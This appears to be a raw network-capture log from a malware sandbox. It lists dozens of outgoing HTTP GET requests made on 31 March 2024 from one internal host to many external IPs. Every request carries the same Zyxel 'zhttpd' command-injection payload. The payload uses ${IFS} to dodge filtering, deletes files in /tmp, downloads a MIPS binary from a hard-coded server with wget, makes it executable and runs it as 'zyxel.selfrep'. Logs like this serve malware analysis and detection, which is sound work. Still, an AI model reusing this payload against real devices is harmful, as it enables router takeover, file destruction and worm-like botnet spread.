                                        Mar 31, 2024 09:21:04.680311918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3602192.168.2.2335856115.121.189.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680366993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3603192.168.2.234869023.133.249.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680437088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3604192.168.2.233688098.23.136.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680478096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3605192.168.2.235291289.251.40.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680529118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3606192.168.2.23461828.56.13.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680603981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3607192.168.2.2337890133.141.26.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680668116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3608192.168.2.233327237.142.10.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680737972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3609192.168.2.2359272135.179.8.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680779934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3610192.168.2.234555013.155.159.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680840015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3611192.168.2.235802493.91.195.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680877924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3612192.168.2.2333910167.63.240.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680941105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3613192.168.2.2356452111.118.121.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681001902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3614192.168.2.2349028195.174.132.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681078911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3615192.168.2.2357176155.166.229.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681097031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3616192.168.2.2357548217.40.84.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681168079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3617192.168.2.235885217.94.208.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681216002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3618192.168.2.2352374195.39.53.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681277990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3619192.168.2.2345902132.41.206.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681334019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3620192.168.2.2353160144.135.39.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681408882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3621192.168.2.2338486149.91.59.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681468964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3622192.168.2.2334922148.185.34.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681550026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3623192.168.2.2354514139.156.27.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681606054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3624192.168.2.2346876197.211.13.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681683064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3625192.168.2.234758085.213.96.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681756020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3626192.168.2.2348664167.158.218.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681802988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3627192.168.2.235165239.209.9.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681855917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3628192.168.2.235735064.12.27.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681905985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3629192.168.2.234195614.41.165.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.681962013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3630192.168.2.23416825.178.120.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682034969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3631192.168.2.2332826193.246.18.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682085991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3632192.168.2.233745869.135.5.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682136059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3633192.168.2.2354504133.128.162.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682193995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3634192.168.2.233703045.194.234.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682249069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3635192.168.2.235865664.206.172.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682296991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3636192.168.2.2340326178.193.35.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682338953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3637192.168.2.2349140161.238.28.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682379007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3638192.168.2.23330205.172.222.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682454109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3639192.168.2.233704619.150.39.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682496071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3640192.168.2.2337278217.106.136.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682574034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3641192.168.2.2335778196.112.20.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682621002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3642192.168.2.234120266.132.75.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682672024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3643192.168.2.234577831.178.32.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682720900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3644192.168.2.234063658.29.146.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682806969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3645192.168.2.234392686.197.208.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682883024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3646192.168.2.2336554197.55.102.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682919025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3647192.168.2.235685290.64.60.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.682971954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3648192.168.2.233935431.143.194.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683022022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3649192.168.2.2339402194.59.217.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683084011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3650192.168.2.2343228105.104.149.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683130026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3651192.168.2.2354322203.229.84.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683182955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3652192.168.2.234343812.11.137.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683238983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3653192.168.2.2348342193.63.70.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683300018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3654192.168.2.23513249.251.175.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683351994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3655192.168.2.2341964191.155.34.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683430910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3656192.168.2.233780278.203.243.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683469057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3657192.168.2.235097459.220.165.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683535099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3658192.168.2.2347044145.9.246.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683609962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3659192.168.2.234659851.68.248.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683670998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3660192.168.2.234947867.98.250.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683736086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3661192.168.2.2352420156.255.179.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683795929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3662192.168.2.2337922152.119.116.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683878899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3663192.168.2.2332932209.116.175.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683921099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3664192.168.2.235436098.81.117.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.683978081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3665192.168.2.234761060.204.131.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684037924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3666192.168.2.2352460102.0.47.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684102058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3667192.168.2.234060286.52.135.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684150934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3668192.168.2.2358512115.218.199.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684222937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3669192.168.2.2360914166.191.240.105443
                                        TimestampBytes transferredDirectionData
